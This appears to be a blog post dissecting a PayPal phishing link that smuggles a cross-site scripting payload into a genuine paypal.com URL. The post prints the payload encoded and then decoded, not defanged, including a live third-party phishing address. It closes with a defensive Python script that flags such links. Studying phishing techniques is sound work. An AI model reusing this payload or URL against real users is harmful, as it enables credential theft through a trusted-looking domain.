
A PayPal phish came into my filters today that had an interesting technique. It's hard to display it, but when I hovered over the link in Firefox, I noticed 2 things:
- The link was actually pointing to https://www.paypal.com
- There was some JavaScript at the end, which I couldn't see completely because the URL was so long.
The URL is obfuscated in the source:
https://www.paypal.com/us/cgi bin/webscr?cmd=_help ext&userID=657SDF34861DEG35S79G54WE3R5QW&userAcctType=paypal SD4F3D3S6VIE3XV15N4S4DLI75EW61E7BI23O&source_page=
%22%3E%3C%53crip%54%20defer%3Efunction%20writeDoc%28%29%7Bn%3Dthis.document%3Bn.
write%28%27%3CTITLE%3EPaypal%3C%2FTITLE%3E%3Cframeset%20rows%3D100%2525%3E%3C
frame%20src%3D%5C%27h%54%54ps%3A%2F%2Fvejledernet.ungevejledningen.dk%2Fraadgivere%2
F_temp%2Fwin32%2Fclass1%2Findex2.htm%5C%27%3E%3C%2Fframeset%3E%27%29%3Bn.close
%28%29%3B%7DsetTimeout%28%27writeDoc%28%29%3B%27%2C1%29%3B%3C%2F%53
crip%54%3E%3C&userStatus=F%29*HG %23%24H%29F_D*%23 %26%24IF* SH%28%29%23JFDS*
O%26OT* H%29%28*SFDH%29H LIDT*Y%23%24%25%29
so just looking at it won't tip you off (although threatening you with the USA PATRIOT ACT is what tipped me off). I wrote a quick Perl translator and came up with (CAUTION: NOT DEFANGED):

https://www.paypal.com/us/cgi bin/webscr?cmd=_help
ext&userID=657SDF34861DEG35S79G54WE3R5QW&userAcctType=paypal
SD4F3D3S6VIE3XV15N4S4DLI75EW61E7BI23O&source_page="><ScripT defer>function
writeDoc(){n=this.document;n.write('<TITLE>Paypal</TITLE><frameset
rows=100%25><frame
src=\'hTTps://vejledernet.ungevejledningen.dk/raadgivere/_temp/win32/class1/index2.htm\'>
</frameset>');n.close();}setTimeout('writeDoc();',1);</ScripT><&userStatus=F)*HG
#$H)F_D*# &$IF* SH()#JFDS* O&OT* H)(*SFDH)H LIDT*Y#$%)
The referenced PayPal CGI program has been removed so you get a 404, but sure enough, it tries to open a popup to vejledernet.ungevejledningen.dk.
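The decoding step described above can be automated for mail-filter triage. The following is an added example, not the Perl translator mentioned in this post: it percent-decodes each query parameter of a link, flags parameters that carry script or frame markup, and prints any embedded URL on a different host in defanged form. The sample link is constructed to mirror the structure of the one above, with a placeholder host (phish.example.invalid), and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample modelled on the link in this post; the framed host
# (phish.example.invalid) is a placeholder, not the real phishing site.
SAMPLE = (
    "https://www.paypal.com/us/cgi-bin/webscr?cmd=_help&source_page="
    "%22%3E%3C%53crip%54%20defer%3En%3Dthis.document%3Bn.write%28%27%3Cframeset"
    "%20rows%3D100%2525%3E%3Cframe%20src%3D%5C%27h%54%54ps%3A%2F%2F"
    "phish.example.invalid%2Fclass1%2Findex2.htm%5C%27%3E%27%29%3B%3C%2F%53crip%54%3E"
    "&userStatus=F%29*HG"
)

MARKUP = re.compile(r"<\s*/?\s*(script|i?frame|frameset)\b", re.I)
EMBEDDED_URL = re.compile(r"https?://([^/\s'\"\\<>]+)[^\s'\"\\<>]*", re.I)

def full_unquote(value, max_rounds=5):
    """Percent-decode repeatedly so double encoding (%2525 -> %25 -> %) is undone."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def defang(url):
    """Make a URL non-clickable for reports: hxxp scheme, bracketed dots."""
    return re.sub(r"^http", "hxxp", url, flags=re.I).replace(".", "[.]")

def analyze(link):
    """Return one finding per query parameter that hides markup or a foreign URL."""
    link_host = (urlsplit(link).hostname or "").lower()
    findings = []
    for pair in urlsplit(link).query.split("&"):
        name, _, raw = pair.partition("=")
        decoded = full_unquote(raw)
        tags = sorted({m.group(1).lower() for m in MARKUP.finditer(decoded)})
        foreign = [defang(m.group(0)) for m in EMBEDDED_URL.finditer(decoded)
                   if m.group(1).lower() != link_host]
        if tags or foreign:
            findings.append({"param": name, "tags": tags, "foreign_urls": foreign})
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(finding)
```

Matching is case-insensitive because the mixed-case `ScripT` and `hTTps` in the original link would slip past a case-sensitive filter.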